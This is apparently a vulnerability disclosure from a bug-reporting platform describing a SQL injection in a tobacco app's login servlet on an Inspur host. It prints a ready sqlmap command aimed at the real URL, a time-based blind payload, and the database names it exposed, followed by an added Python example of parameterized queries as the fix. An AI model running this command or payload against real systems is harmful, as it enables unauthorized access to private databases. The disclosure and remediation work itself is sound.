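2016-02-17: Details reported to the vendor; awaiting vendor handling
2016-02-22: The vendor has actively ignored the vulnerability; details disclosed to the public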
As the title says.
This odd app, 烟草e通: SQL injection at the login.
python sqlmap.py -u "http://sjdy.inspur.com/app/servlet/validate" --data "userid=admin&pwd=034232d0d08907880acefc5efc0408eb&mobile=188888888&os=android&version=1.1.2&uim=460031410561419&imageversion=1" --dbs
Parameter: userid (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: userid=admin' AND (SELECT * FROM (SELECT(SLEEP(5)))hNby) AND 'YBMg'='YBMg&pwd=034232d0d08907880acefc5efc0408eb&mobile=188888888&os=android&version=1.1.2&uim=460031410561419&imageversion=1
---
[12:21:13] [INFO] the back-end DBMS is MySQL
web application technology: JSP
back-end DBMS: MySQL 5.0.12
[12:21:13] [INFO] fetching database names
[12:21:13] [INFO] fetching number of databases
[12:21:13] [INFO] resumed: 8
[12:21:13] [INFO] resumed: information_schema
[12:21:13] [INFO] resumed: ZHSW_APP
[12:21:13] [INFO] resumed: ZHSW_PM
[12:21:13] [INFO] resumed: mysql
[12:21:13] [INFO] resumed: pay
[12:21:13] [INFO] resumed: performance_schema
[12:21:13] [INFO] resumed: pm
[12:21:13] [INFO] resumed: test
available databases [8]:
[*] information_schema
[*] mysql
[*] pay
[*] performance_schema
[*] pm
[*] test
[*] ZHSW_APP
[*] ZHSW_PM
The domain belongs to Inspur, so hand it over to Inspur.
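On the remediation side, the following added example (not part of the original report and not the vendor's code) shows why the userid payload in the sqlmap output executes under string concatenation and stays inert when the value is bound as a parameter. It assumes a hypothetical users table, uses an in-memory SQLite database as a stand-in for the MySQL back end, and replaces SLEEP() with a stub that only counts calls.

```python
import sqlite3

# Constructed sample row; pwd is the 32-hex value from the request shown on this page.
PWD = "034232d0d08907880acefc5efc0408eb"
# userid value from the sqlmap "Payload:" line above.
PAYLOAD = "admin' AND (SELECT * FROM (SELECT(SLEEP(5)))hNby) AND 'YBMg'='YBMg"


def make_db():
    """In-memory stand-in for the login table, with a SLEEP() that only counts calls."""
    calls = []
    db = sqlite3.connect(":memory:")
    # Assumption: SQLite has no SLEEP(); this stub records the call instead of delaying.
    db.create_function("SLEEP", 1, lambda secs: calls.append(secs) or 0)
    # Hypothetical schema; the real table layout is not given in the report.
    db.execute("CREATE TABLE users (userid TEXT PRIMARY KEY, pwd TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', ?)", (PWD,))
    return db, calls


def login_concat(db, userid, pwd):
    """Vulnerable pattern: request values are spliced into the SQL text."""
    sql = "SELECT 1 FROM users WHERE userid='%s' AND pwd='%s'" % (userid, pwd)
    return db.execute(sql).fetchone() is not None


def login_bound(db, userid, pwd):
    """Hardened pattern: values are bound, so they can never become SQL syntax."""
    sql = "SELECT 1 FROM users WHERE userid=? AND pwd=?"
    return db.execute(sql, (userid, pwd)).fetchone() is not None


def sleep_calls(login, userid):
    """Run one login attempt and return how many times SLEEP() was executed."""
    db, calls = make_db()
    login(db, userid, PWD)
    return len(calls)


if __name__ == "__main__":
    print("concatenated query, SLEEP calls:", sleep_calls(login_concat, PAYLOAD))
    print("bound parameters,   SLEEP calls:", sleep_calls(login_bound, PAYLOAD))
```

In a JSP/servlet back end the equivalent of login_bound is a java.sql.PreparedStatement with `?` placeholders for every request value.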
Severity: no impact (ignored by vendor)
Ignored at: 2016-02-22 13:10
Vulnerability Rank: 15 (WooYun rating)
None yet